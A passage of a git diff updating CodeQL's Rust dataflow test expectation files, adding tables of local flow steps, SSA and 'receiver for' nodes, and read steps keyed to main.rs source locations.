data_through_call | +| main.rs:230:5:230:34 | data_through_nested_function(...) | main.rs:48:1:57:1 | fn data_through_nested_function | +| main.rs:232:5:232:24 | data_out_of_method(...) | main.rs:88:1:92:1 | fn data_out_of_method | +| main.rs:233:5:233:28 | data_in_to_method_call(...) | main.rs:94:1:98:1 | fn data_in_to_method_call | +| main.rs:234:5:234:25 | data_through_method(...) | main.rs:100:1:105:1 | fn data_through_method | +| main.rs:236:5:236:31 | test_operator_overloading(...) | main.rs:148:1:164:1 | fn test_operator_overloading | +| main.rs:237:5:237:22 | test_async_await(...) | main.rs:219:1:224:1 | fn test_async_await | diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 00b35694976a..be64618edc62 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -277,22 +277,32 @@ localStep | main.rs:240:9:240:10 | s1 | main.rs:240:9:240:10 | [SSA] s1 | | main.rs:240:9:240:10 | s1 | main.rs:240:9:240:10 | s1 | | main.rs:240:14:240:29 | Some(...) | main.rs:240:9:240:10 | s1 | +| main.rs:241:10:241:11 | s1 | main.rs:241:10:241:20 | receiver for s1 | +| main.rs:241:10:241:20 | [post] receiver for s1 | main.rs:241:10:241:11 | [post] s1 | | main.rs:245:9:245:10 | [SSA] s1 | main.rs:246:10:246:11 | s1 | | main.rs:245:9:245:10 | s1 | main.rs:245:9:245:10 | [SSA] s1 | | main.rs:245:9:245:10 | s1 | main.rs:245:9:245:10 | s1 | | main.rs:245:14:245:29 | Some(...) | main.rs:245:9:245:10 | s1 | +| main.rs:246:10:246:11 | s1 | main.rs:246:10:246:24 | receiver for s1 | +| main.rs:246:10:246:24 | [post] receiver for s1 | main.rs:246:10:246:11 | [post] s1 | | main.rs:248:9:248:10 | [SSA] s2 | main.rs:249:10:249:11 | s2 | | main.rs:248:9:248:10 | s2 | main.rs:248:9:248:10 | [SSA] s2 | | main.rs:248:9:248:10 | s2 | main.rs:248:9:248:10 | s2 | | main.rs:248:14:248:20 | Some(...) | main.rs:248:9:248:10 | s2 | +| main.rs:249:10:249:11 | s2 | main.rs:249:10:249:33 | receiver for s2 | +| main.rs:249:10:249:33 | [post] receiver for s2 | main.rs:249:10:249:11 | [post] s2 | | main.rs:253:9:253:10 | [SSA] s1 | main.rs:254:10:254:11 | s1 | | main.rs:253:9:253:10 | s1 | main.rs:253:9:253:10 | [SSA] s1 | | main.rs:253:9:253:10 | s1 | main.rs:253:9:253:10 | s1 | | main.rs:253:14:253:29 | Some(...) | main.rs:253:9:253:10 | s1 | +| main.rs:254:10:254:11 | s1 | main.rs:254:10:254:32 | receiver for s1 | +| main.rs:254:10:254:32 | [post] receiver for s1 | main.rs:254:10:254:11 | [post] s1 | | main.rs:256:9:256:10 | [SSA] s2 | main.rs:257:10:257:11 | s2 | | main.rs:256:9:256:10 | s2 | main.rs:256:9:256:10 | [SSA] s2 | | main.rs:256:9:256:10 | s2 | main.rs:256:9:256:10 | s2 | | main.rs:256:14:256:17 | None | main.rs:256:9:256:10 | s2 | +| main.rs:257:10:257:11 | s2 | main.rs:257:10:257:41 | receiver for s2 | +| main.rs:257:10:257:41 | [post] receiver for s2 | main.rs:257:10:257:11 | [post] s2 | | main.rs:261:9:261:10 | [SSA] s1 | main.rs:263:14:263:15 | s1 | | main.rs:261:9:261:10 | s1 | main.rs:261:9:261:10 | [SSA] s1 | | main.rs:261:9:261:10 | s1 | main.rs:261:9:261:10 | s1 | @@ -331,18 +341,30 @@ localStep | main.rs:277:9:277:10 | i3 | main.rs:277:9:277:10 | i3 | | main.rs:277:14:277:16 | TryExpr | main.rs:277:9:277:10 | i3 | | main.rs:279:5:279:9 | Ok(...) | main.rs:269:46:280:1 | { ... } | +| main.rs:283:9:283:10 | [SSA] s1 | main.rs:284:10:284:11 | [SSA] s1 | | main.rs:283:9:283:10 | [SSA] s1 | main.rs:284:10:284:11 | s1 | | main.rs:283:9:283:10 | s1 | main.rs:283:9:283:10 | [SSA] s1 | | main.rs:283:9:283:10 | s1 | main.rs:283:9:283:10 | s1 | | main.rs:283:32:283:45 | Ok(...) | main.rs:283:9:283:10 | s1 | +| main.rs:284:10:284:11 | [SSA] s1 | main.rs:285:10:285:11 | s1 | | main.rs:284:10:284:11 | [post] s1 | main.rs:285:10:285:11 | s1 | +| main.rs:284:10:284:11 | s1 | main.rs:284:10:284:22 | receiver for s1 | | main.rs:284:10:284:11 | s1 | main.rs:285:10:285:11 | s1 | +| main.rs:284:10:284:22 | [post] receiver for s1 | main.rs:284:10:284:11 | [post] s1 | +| main.rs:285:10:285:11 | s1 | main.rs:285:10:285:26 | receiver for s1 | +| main.rs:285:10:285:26 | [post] receiver for s1 | main.rs:285:10:285:11 | [post] s1 | +| main.rs:287:9:287:10 | [SSA] s2 | main.rs:288:10:288:11 | [SSA] s2 | | main.rs:287:9:287:10 | [SSA] s2 | main.rs:288:10:288:11 | s2 | | main.rs:287:9:287:10 | s2 | main.rs:287:9:287:10 | [SSA] s2 | | main.rs:287:9:287:10 | s2 | main.rs:287:9:287:10 | s2 | | main.rs:287:32:287:46 | Err(...) | main.rs:287:9:287:10 | s2 | +| main.rs:288:10:288:11 | [SSA] s2 | main.rs:289:10:289:11 | s2 | | main.rs:288:10:288:11 | [post] s2 | main.rs:289:10:289:11 | s2 | +| main.rs:288:10:288:11 | s2 | main.rs:288:10:288:22 | receiver for s2 | | main.rs:288:10:288:11 | s2 | main.rs:289:10:289:11 | s2 | +| main.rs:288:10:288:22 | [post] receiver for s2 | main.rs:288:10:288:11 | [post] s2 | +| main.rs:289:10:289:11 | s2 | main.rs:289:10:289:26 | receiver for s2 | +| main.rs:289:10:289:26 | [post] receiver for s2 | main.rs:289:10:289:11 | [post] s2 | | main.rs:298:9:298:10 | [SSA] s1 | main.rs:300:11:300:12 | s1 | | main.rs:298:9:298:10 | s1 | main.rs:298:9:298:10 | [SSA] s1 | | main.rs:298:9:298:10 | s1 | main.rs:298:9:298:10 | s1 | @@ -591,8 +613,10 @@ localStep | main.rs:426:39:426:72 | ...: Vec::<...> | main.rs:426:39:426:43 | names | | main.rs:427:9:427:20 | default_name | main.rs:427:9:427:20 | [SSA] default_name | | main.rs:427:9:427:20 | default_name | main.rs:427:9:427:20 | default_name | +| main.rs:427:24:427:33 | source(...) | main.rs:427:24:427:45 | receiver for source(...) | | main.rs:427:24:427:45 | ... .to_string(...) | main.rs:427:9:427:20 | default_name | | main.rs:427:24:427:45 | ... .to_string(...) | main.rs:428:9:428:20 | phi(default_name) | +| main.rs:427:24:427:45 | [post] receiver for source(...) | main.rs:427:24:427:33 | [post] source(...) | | main.rs:428:5:434:5 | for ... in ... { ... } | main.rs:426:75:435:1 | { ... } | | main.rs:428:9:428:20 | phi(default_name) | main.rs:428:9:428:20 | phi(default_name) | | main.rs:428:9:428:20 | phi(default_name) | main.rs:430:41:430:67 | default_name | @@ -606,10 +630,16 @@ localStep | main.rs:430:17:430:17 | [SSA] n | main.rs:431:18:431:18 | n | | main.rs:430:17:430:17 | n | main.rs:430:17:430:17 | [SSA] n | | main.rs:430:17:430:17 | n | main.rs:430:17:430:17 | n | +| main.rs:430:21:430:24 | name | main.rs:430:21:430:68 | receiver for name | +| main.rs:430:21:430:68 | [post] receiver for name | main.rs:430:21:430:24 | [post] name | | main.rs:430:21:430:68 | name.unwrap_or_else(...) | main.rs:430:17:430:17 | n | | main.rs:430:41:430:67 | [post] default_name | main.rs:428:9:428:20 | phi(default_name) | | main.rs:430:41:430:67 | closure self in \|...\| ... | main.rs:430:44:430:55 | this | | main.rs:430:41:430:67 | default_name | main.rs:428:9:428:20 | phi(default_name) | +| main.rs:430:44:430:55 | default_name | main.rs:430:44:430:67 | receiver for default_name | +| main.rs:430:44:430:67 | [post] receiver for default_name | main.rs:430:44:430:55 | [post] default_name | +| main.rs:431:18:431:18 | n | main.rs:431:18:431:24 | receiver for n | +| main.rs:431:18:431:24 | [post] receiver for n | main.rs:431:18:431:18 | [post] n | | main.rs:444:9:444:9 | [SSA] s | main.rs:445:10:445:10 | s | | main.rs:444:9:444:9 | s | main.rs:444:9:444:9 | [SSA] s | | main.rs:444:9:444:9 | s | main.rs:444:9:444:9 | s | @@ -620,64 +650,129 @@ localStep | main.rs:448:16:448:16 | s | main.rs:448:16:448:16 | s | | main.rs:448:16:448:24 | ...: String | main.rs:448:16:448:16 | s | | main.rs:449:14:449:20 | FormatArgsExpr | main.rs:449:14:449:20 | MacroExpr | +| main.rs:453:9:453:9 | [SSA] a | main.rs:454:13:454:13 | [SSA] a | | main.rs:453:9:453:9 | [SSA] a | main.rs:454:13:454:13 | a | | main.rs:453:9:453:9 | a | main.rs:453:9:453:9 | [SSA] a | | main.rs:453:9:453:9 | a | main.rs:453:9:453:9 | a | | main.rs:453:13:453:22 | source(...) | main.rs:453:9:453:9 | a | +| main.rs:454:9:454:9 | [SSA] b | main.rs:455:13:455:13 | [SSA] b | | main.rs:454:9:454:9 | [SSA] b | main.rs:455:13:455:13 | b | | main.rs:454:9:454:9 | b | main.rs:454:9:454:9 | [SSA] b | | main.rs:454:9:454:9 | b | main.rs:454:9:454:9 | b | +| main.rs:454:13:454:13 | [SSA] a | main.rs:458:10:458:10 | a | | main.rs:454:13:454:13 | [post] a | main.rs:458:10:458:10 | a | +| main.rs:454:13:454:13 | a | main.rs:454:13:454:25 | receiver for a | | main.rs:454:13:454:13 | a | main.rs:458:10:458:10 | a | +| main.rs:454:13:454:25 | [post] receiver for a | main.rs:454:13:454:13 | [post] a | | main.rs:454:13:454:25 | a.to_string(...) | main.rs:454:9:454:9 | b | | main.rs:455:9:455:9 | [SSA] c | main.rs:460:10:460:10 | c | | main.rs:455:9:455:9 | c | main.rs:455:9:455:9 | [SSA] c | | main.rs:455:9:455:9 | c | main.rs:455:9:455:9 | c | +| main.rs:455:13:455:13 | [SSA] b | main.rs:456:19:456:19 | [SSA] b | +| main.rs:455:13:455:13 | [SSA] b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:13 | [post] b | main.rs:456:19:456:19 | [SSA] b | | main.rs:455:13:455:13 | [post] b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:13 | b | main.rs:455:13:455:28 | receiver for b | +| main.rs:455:13:455:13 | b | main.rs:456:19:456:19 | [SSA] b | | main.rs:455:13:455:13 | b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:28 | [post] receiver for b | main.rs:455:13:455:13 | [post] b | +| main.rs:455:13:455:28 | b.parse(...) | main.rs:455:13:455:37 | receiver for b.parse(...) | | main.rs:455:13:455:37 | ... .unwrap(...) | main.rs:455:9:455:9 | c | +| main.rs:455:13:455:37 | [post] receiver for b.parse(...) | main.rs:455:13:455:28 | [post] b.parse(...) | | main.rs:456:9:456:9 | [SSA] d | main.rs:461:10:461:10 | d | | main.rs:456:9:456:9 | d | main.rs:456:9:456:9 | [SSA] d | | main.rs:456:9:456:9 | d | main.rs:456:9:456:9 | d | +| main.rs:456:19:456:19 | [SSA] b | main.rs:459:17:459:17 | b | | main.rs:456:19:456:19 | [post] b | main.rs:459:17:459:17 | b | +| main.rs:456:19:456:19 | b | main.rs:456:19:456:27 | receiver for b | | main.rs:456:19:456:19 | b | main.rs:459:17:459:17 | b | +| main.rs:456:19:456:27 | [post] receiver for b | main.rs:456:19:456:19 | [post] b | +| main.rs:456:19:456:27 | b.parse(...) | main.rs:456:19:456:36 | receiver for b.parse(...) | | main.rs:456:19:456:36 | ... .unwrap(...) | main.rs:456:9:456:9 | d | +| main.rs:456:19:456:36 | [post] receiver for b.parse(...) | main.rs:456:19:456:27 | [post] b.parse(...) | | main.rs:465:9:465:10 | [SSA] vs | main.rs:467:10:467:11 | vs | | main.rs:465:9:465:10 | vs | main.rs:465:9:465:10 | [SSA] vs | | main.rs:465:9:465:10 | vs | main.rs:465:9:465:10 | vs | | main.rs:465:14:465:34 | [...] | main.rs:465:9:465:10 | vs | +| main.rs:467:10:467:11 | [post] vs | main.rs:468:11:468:12 | [SSA] vs | | main.rs:467:10:467:11 | [post] vs | main.rs:468:11:468:12 | vs | +| main.rs:467:10:467:11 | vs | main.rs:468:11:468:12 | [SSA] vs | | main.rs:467:10:467:11 | vs | main.rs:468:11:468:12 | vs | +| main.rs:468:11:468:12 | [SSA] vs | main.rs:469:11:469:12 | [SSA] vs | +| main.rs:468:11:468:12 | [SSA] vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:12 | [post] vs | main.rs:469:11:469:12 | [SSA] vs | | main.rs:468:11:468:12 | [post] vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:12 | vs | main.rs:468:11:468:19 | receiver for vs | +| main.rs:468:11:468:12 | vs | main.rs:469:11:469:12 | [SSA] vs | | main.rs:468:11:468:12 | vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:19 | [post] receiver for vs | main.rs:468:11:468:12 | [post] vs | +| main.rs:468:11:468:19 | vs.iter(...) | main.rs:468:11:468:26 | receiver for vs.iter(...) | +| main.rs:468:11:468:26 | ... .next(...) | main.rs:468:11:468:35 | receiver for ... .next(...) | +| main.rs:468:11:468:26 | [post] receiver for vs.iter(...) | main.rs:468:11:468:19 | [post] vs.iter(...) | +| main.rs:468:11:468:35 | [post] receiver for ... .next(...) | main.rs:468:11:468:26 | [post] ... .next(...) | +| main.rs:469:11:469:12 | [SSA] vs | main.rs:471:14:471:15 | vs | | main.rs:469:11:469:12 | [post] vs | main.rs:471:14:471:15 | vs | +| main.rs:469:11:469:12 | vs | main.rs:469:11:469:19 | receiver for vs | | main.rs:469:11:469:12 | vs | main.rs:471:14:471:15 | vs | +| main.rs:469:11:469:19 | [post] receiver for vs | main.rs:469:11:469:12 | [post] vs | +| main.rs:469:11:469:19 | vs.iter(...) | main.rs:469:11:469:26 | receiver for vs.iter(...) | +| main.rs:469:11:469:26 | ... .nth(...) | main.rs:469:11:469:35 | receiver for ... .nth(...) | +| main.rs:469:11:469:26 | [post] receiver for vs.iter(...) | main.rs:469:11:469:19 | [post] vs.iter(...) | +| main.rs:469:11:469:35 | [post] receiver for ... .nth(...) | main.rs:469:11:469:26 | [post] ... .nth(...) | | main.rs:471:9:471:9 | [SSA] v | main.rs:472:14:472:14 | v | | main.rs:471:9:471:9 | v | main.rs:471:9:471:9 | [SSA] v | | main.rs:471:9:471:9 | v | main.rs:471:9:471:9 | v | +| main.rs:471:14:471:15 | vs | main.rs:474:15:474:16 | [SSA] vs | | main.rs:471:14:471:15 | vs | main.rs:474:15:474:16 | vs | | main.rs:474:10:474:10 | [SSA] v | main.rs:475:14:475:14 | v | | main.rs:474:10:474:10 | v | main.rs:474:10:474:10 | [SSA] v | | main.rs:474:10:474:10 | v | main.rs:474:10:474:10 | v | +| main.rs:474:15:474:16 | [SSA] vs | main.rs:478:27:478:28 | [SSA] vs | +| main.rs:474:15:474:16 | [SSA] vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:16 | [post] vs | main.rs:478:27:478:28 | [SSA] vs | | main.rs:474:15:474:16 | [post] vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:16 | vs | main.rs:474:15:474:23 | receiver for vs | +| main.rs:474:15:474:16 | vs | main.rs:478:27:478:28 | [SSA] vs | | main.rs:474:15:474:16 | vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:23 | [post] receiver for vs | main.rs:474:15:474:16 | [post] vs | | main.rs:478:9:478:11 | [SSA] vs2 | main.rs:479:15:479:17 | vs2 | | main.rs:478:9:478:11 | vs2 | main.rs:478:9:478:11 | [SSA] vs2 | | main.rs:478:9:478:11 | vs2 | main.rs:478:9:478:11 | vs2 | +| main.rs:478:27:478:28 | [SSA] vs | main.rs:483:5:483:6 | [SSA] vs | +| main.rs:478:27:478:28 | [SSA] vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:28 | [post] vs | main.rs:483:5:483:6 | [SSA] vs | | main.rs:478:27:478:28 | [post] vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:28 | vs | main.rs:478:27:478:35 | receiver for vs | +| main.rs:478:27:478:28 | vs | main.rs:483:5:483:6 | [SSA] vs | | main.rs:478:27:478:28 | vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:35 | [post] receiver for vs | main.rs:478:27:478:28 | [post] vs | +| main.rs:478:27:478:35 | vs.iter(...) | main.rs:478:27:478:45 | receiver for vs.iter(...) | | main.rs:478:27:478:45 | ... .collect(...) | main.rs:478:9:478:11 | vs2 | +| main.rs:478:27:478:45 | [post] receiver for vs.iter(...) | main.rs:478:27:478:35 | [post] vs.iter(...) | | main.rs:479:10:479:10 | [SSA] v | main.rs:480:14:480:14 | v | | main.rs:479:10:479:10 | v | main.rs:479:10:479:10 | [SSA] v | | main.rs:479:10:479:10 | v | main.rs:479:10:479:10 | v | +| main.rs:483:5:483:6 | [SSA] vs | main.rs:484:5:484:6 | [SSA] vs | +| main.rs:483:5:483:6 | [SSA] vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:6 | [post] vs | main.rs:484:5:484:6 | [SSA] vs | | main.rs:483:5:483:6 | [post] vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:6 | vs | main.rs:483:5:483:13 | receiver for vs | +| main.rs:483:5:483:6 | vs | main.rs:484:5:484:6 | [SSA] vs | | main.rs:483:5:483:6 | vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:13 | [post] receiver for vs | main.rs:483:5:483:6 | [post] vs | +| main.rs:483:5:483:13 | vs.iter(...) | main.rs:483:5:483:31 | receiver for vs.iter(...) | +| main.rs:483:5:483:31 | [post] receiver for vs.iter(...) | main.rs:483:5:483:13 | [post] vs.iter(...) | | main.rs:483:20:483:20 | ... | main.rs:483:20:483:20 | x | | main.rs:483:20:483:20 | [SSA] x | main.rs:483:29:483:29 | x | | main.rs:483:20:483:20 | x | main.rs:483:20:483:20 | [SSA] x | | main.rs:483:20:483:20 | x | main.rs:483:20:483:20 | x | +| main.rs:484:5:484:6 | [SSA] vs | main.rs:486:14:486:15 | vs | | main.rs:484:5:484:6 | [post] vs | main.rs:486:14:486:15 | vs | +| main.rs:484:5:484:6 | vs | main.rs:484:5:484:13 | receiver for vs | | main.rs:484:5:484:6 | vs | main.rs:486:14:486:15 | vs | +| main.rs:484:5:484:13 | [post] receiver for vs | main.rs:484:5:484:6 | [post] vs | +| main.rs:484:5:484:13 | vs.iter(...) | main.rs:484:5:484:36 | receiver for vs.iter(...) | +| main.rs:484:5:484:36 | [post] receiver for vs.iter(...) | main.rs:484:5:484:13 | [post] vs.iter(...) | | main.rs:484:25:484:25 | ... | main.rs:484:25:484:25 | x | | main.rs:484:25:484:25 | [SSA] x | main.rs:484:34:484:34 | x | | main.rs:484:25:484:25 | x | main.rs:484:25:484:25 | [SSA] x | @@ -685,12 +780,43 @@ localStep | main.rs:486:9:486:9 | [SSA] v | main.rs:487:14:487:14 | v | | main.rs:486:9:486:9 | v | main.rs:486:9:486:9 | [SSA] v | | main.rs:486:9:486:9 | v | main.rs:486:9:486:9 | v | +| main.rs:486:14:486:15 | vs | main.rs:486:14:486:27 | receiver for vs | +| main.rs:486:14:486:27 | [post] receiver for vs | main.rs:486:14:486:15 | [post] vs | | main.rs:490:9:490:18 | mut vs_mut | main.rs:490:13:490:18 | vs_mut | +| main.rs:490:13:490:18 | [SSA] vs_mut | main.rs:492:10:492:15 | vs_mut | +| main.rs:490:13:490:18 | vs_mut | main.rs:490:13:490:18 | [SSA] vs_mut | | main.rs:490:22:490:42 | [...] | main.rs:490:9:490:18 | mut vs_mut | +| main.rs:492:10:492:15 | [post] vs_mut | main.rs:493:11:493:16 | [SSA] vs_mut | +| main.rs:492:10:492:15 | [post] vs_mut | main.rs:493:11:493:16 | vs_mut | +| main.rs:492:10:492:15 | vs_mut | main.rs:493:11:493:16 | [SSA] vs_mut | +| main.rs:492:10:492:15 | vs_mut | main.rs:493:11:493:16 | vs_mut | +| main.rs:493:11:493:16 | [SSA] vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | [SSA] vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:16 | [post] vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | [post] vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:493:11:493:23 | receiver for vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:23 | [post] receiver for vs_mut | main.rs:493:11:493:16 | [post] vs_mut | +| main.rs:493:11:493:23 | vs_mut.iter(...) | main.rs:493:11:493:30 | receiver for vs_mut.iter(...) | +| main.rs:493:11:493:30 | ... .next(...) | main.rs:493:11:493:39 | receiver for ... .next(...) | +| main.rs:493:11:493:30 | [post] receiver for vs_mut.iter(...) | main.rs:493:11:493:23 | [post] vs_mut.iter(...) | +| main.rs:493:11:493:39 | [post] receiver for ... .next(...) | main.rs:493:11:493:30 | [post] ... .next(...) | +| main.rs:494:11:494:16 | [SSA] vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:16 | [post] vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:16 | vs_mut | main.rs:494:11:494:23 | receiver for vs_mut | +| main.rs:494:11:494:16 | vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:23 | [post] receiver for vs_mut | main.rs:494:11:494:16 | [post] vs_mut | +| main.rs:494:11:494:23 | vs_mut.iter(...) | main.rs:494:11:494:30 | receiver for vs_mut.iter(...) | +| main.rs:494:11:494:30 | ... .nth(...) | main.rs:494:11:494:39 | receiver for ... .nth(...) | +| main.rs:494:11:494:30 | [post] receiver for vs_mut.iter(...) | main.rs:494:11:494:23 | [post] vs_mut.iter(...) | +| main.rs:494:11:494:39 | [post] receiver for ... .nth(...) | main.rs:494:11:494:30 | [post] ... .nth(...) | | main.rs:496:5:498:5 | for ... in ... { ... } | main.rs:464:16:499:1 | { ... } | | main.rs:496:14:496:14 | [SSA] v | main.rs:497:14:497:14 | v | | main.rs:496:14:496:14 | v | main.rs:496:14:496:14 | [SSA] v | | main.rs:496:14:496:14 | v | main.rs:496:14:496:14 | v | +| main.rs:496:19:496:24 | vs_mut | main.rs:496:19:496:35 | receiver for vs_mut | +| main.rs:496:19:496:35 | [post] receiver for vs_mut | main.rs:496:19:496:24 | [post] vs_mut | | main.rs:502:9:502:9 | [SSA] a | main.rs:507:10:507:10 | a | | main.rs:502:9:502:9 | a | main.rs:502:9:502:9 | [SSA] a | | main.rs:502:9:502:9 | a | main.rs:502:9:502:9 | a | @@ -2726,6 +2852,11 @@ readStep | main.rs:221:9:221:23 | ...::Some(...) | Some | main.rs:221:22:221:22 | n | | main.rs:230:9:230:15 | Some(...) | Some | main.rs:230:14:230:14 | n | | main.rs:234:9:234:15 | Some(...) | Some | main.rs:234:14:234:14 | n | +| main.rs:241:10:241:11 | s1 | &ref | main.rs:241:10:241:20 | receiver for s1 | +| main.rs:246:10:246:11 | s1 | &ref | main.rs:246:10:246:24 | receiver for s1 | +| main.rs:249:10:249:11 | s2 | &ref | main.rs:249:10:249:33 | receiver for s2 | +| main.rs:254:10:254:11 | s1 | &ref | main.rs:254:10:254:32 | receiver for s1 | +| main.rs:257:10:257:11 | s2 | &ref | main.rs:257:10:257:41 | receiver for s2 | | main.rs:263:14:263:15 | s1 | Ok | main.rs:263:14:263:16 | TryExpr | | main.rs:263:14:263:15 | s1 | Some | main.rs:263:14:263:16 | TryExpr | | main.rs:265:10:265:11 | s2 | Ok | main.rs:265:10:265:12 | TryExpr | @@ -2736,6 +2867,10 @@ readStep | main.rs:274:14:274:15 | s2 | Some | main.rs:274:14:274:16 | TryExpr | | main.rs:277:14:277:15 | s3 | Ok | main.rs:277:14:277:16 | TryExpr | | main.rs:277:14:277:15 | s3 | Some | main.rs:277:14:277:16 | TryExpr | +| main.rs:284:10:284:11 | s1 | &ref | main.rs:284:10:284:22 | receiver for s1 | +| main.rs:285:10:285:11 | s1 | &ref | main.rs:285:10:285:26 | receiver for s1 | +| main.rs:288:10:288:11 | s2 | &ref | main.rs:288:10:288:22 | receiver for s2 | +| main.rs:289:10:289:11 | s2 | &ref | main.rs:289:10:289:26 | receiver for s2 | | main.rs:301:9:301:25 | ...::A(...) | A | main.rs:301:24:301:24 | n | | main.rs:302:9:302:25 | ...::B(...) | B | main.rs:302:24:302:24 | n | | main.rs:305:9:305:25 | ...::A(...) | A | main.rs:305:24:305:24 | n | @@ -2775,22 +2910,38 @@ readStep | main.rs:428:9:428:20 | TuplePat | tuple.0 | main.rs:428:10:428:13 | cond | | main.rs:428:9:428:20 | TuplePat | tuple.1 | main.rs:428:16:428:19 | name | | main.rs:428:25:428:29 | names | element | main.rs:428:9:428:20 | TuplePat | +| main.rs:430:21:430:24 | name | &ref | main.rs:430:21:430:68 | receiver for name | | main.rs:430:41:430:67 | [post] \|...\| ... | captured default_name | main.rs:430:41:430:67 | [post] default_name | +| main.rs:430:44:430:55 | default_name | &ref | main.rs:430:44:430:67 | receiver for default_name | | main.rs:430:44:430:55 | this | captured default_name | main.rs:430:44:430:55 | default_name | +| main.rs:431:18:431:18 | n | &ref | main.rs:431:18:431:24 | receiver for n | +| main.rs:454:13:454:13 | a | &ref | main.rs:454:13:454:25 | receiver for a | +| main.rs:455:13:455:13 | b | &ref | main.rs:455:13:455:28 | receiver for b | +| main.rs:456:19:456:19 | b | &ref | main.rs:456:19:456:27 | receiver for b | | main.rs:467:10:467:11 | vs | element | main.rs:467:10:467:14 | vs[0] | +| main.rs:468:11:468:12 | vs | &ref | main.rs:468:11:468:19 | receiver for vs | | main.rs:468:11:468:35 | ... .unwrap(...) | &ref | main.rs:468:10:468:35 | * ... | +| main.rs:469:11:469:12 | vs | &ref | main.rs:469:11:469:19 | receiver for vs | | main.rs:469:11:469:35 | ... .unwrap(...) | &ref | main.rs:469:10:469:35 | * ... | | main.rs:471:14:471:15 | vs | element | main.rs:471:9:471:9 | v | | main.rs:474:9:474:10 | &... | &ref | main.rs:474:10:474:10 | v | +| main.rs:474:15:474:16 | vs | &ref | main.rs:474:15:474:23 | receiver for vs | | main.rs:474:15:474:23 | vs.iter(...) | element | main.rs:474:9:474:10 | &... | +| main.rs:478:27:478:28 | vs | &ref | main.rs:478:27:478:35 | receiver for vs | | main.rs:479:9:479:10 | &... | &ref | main.rs:479:10:479:10 | v | | main.rs:479:15:479:17 | vs2 | element | main.rs:479:9:479:10 | &... | +| main.rs:483:5:483:6 | vs | &ref | main.rs:483:5:483:13 | receiver for vs | | main.rs:483:29:483:29 | x | &ref | main.rs:483:28:483:29 | * ... | +| main.rs:484:5:484:6 | vs | &ref | main.rs:484:5:484:13 | receiver for vs | | main.rs:484:34:484:34 | x | &ref | main.rs:484:33:484:34 | * ... | +| main.rs:486:14:486:15 | vs | &ref | main.rs:486:14:486:27 | receiver for vs | | main.rs:486:14:486:27 | vs.into_iter(...) | element | main.rs:486:9:486:9 | v | | main.rs:492:10:492:15 | vs_mut | element | main.rs:492:10:492:18 | vs_mut[0] | +| main.rs:493:11:493:16 | vs_mut | &ref | main.rs:493:11:493:23 | receiver for vs_mut | | main.rs:493:11:493:39 | ... .unwrap(...) | &ref | main.rs:493:10:493:39 | * ... | +| main.rs:494:11:494:16 | vs_mut | &ref | main.rs:494:11:494:23 | receiver for vs_mut | | main.rs:494:11:494:39 | ... .unwrap(...) | &ref | main.rs:494:10:494:39 | * ... | | main.rs:496:9:496:14 | &mut ... | &ref | main.rs:496:14:496:14 | v | +| main.rs:496:19:496:24 | vs_mut | &ref | main.rs:496:19:496:35 | receiver for vs_mut | | main.rs:496:19:496:35 | vs_mut.iter_mut(...) | element | main.rs:496:9:496:14 | &mut ... | | main.rs:510:11:510:15 | c_ref | &ref | main.rs:510:10:510:15 | * ... | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 0c9dad76710b..0781289e30f5 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -77,19 +77,16 @@ edges | main.rs:229:11:229:12 | s1 [Some] | main.rs:230:9:230:15 | Some(...) [Some] | provenance | | | main.rs:230:9:230:15 | Some(...) [Some] | main.rs:230:14:230:14 | n | provenance | | | main.rs:230:14:230:14 | n | main.rs:230:25:230:25 | n | provenance | | -| main.rs:240:9:240:10 | s1 [Some] | main.rs:241:10:241:11 | s1 [Some] | provenance | | +| main.rs:240:9:240:10 | s1 [Some] | main.rs:241:10:241:20 | s1.unwrap(...) | provenance | MaD:1 | | main.rs:240:14:240:29 | Some(...) [Some] | main.rs:240:9:240:10 | s1 [Some] | provenance | | | main.rs:240:19:240:28 | source(...) | main.rs:240:14:240:29 | Some(...) [Some] | provenance | | -| main.rs:241:10:241:11 | s1 [Some] | main.rs:241:10:241:20 | s1.unwrap(...) | provenance | MaD:1 | -| main.rs:245:9:245:10 | s1 [Some] | main.rs:246:10:246:11 | s1 [Some] | provenance | | +| main.rs:245:9:245:10 | s1 [Some] | main.rs:246:10:246:24 | s1.unwrap_or(...) | provenance | MaD:3 | | main.rs:245:14:245:29 | Some(...) [Some] | main.rs:245:9:245:10 | s1 [Some] | provenance | | | main.rs:245:19:245:28 | source(...) | main.rs:245:14:245:29 | Some(...) [Some] | provenance | | 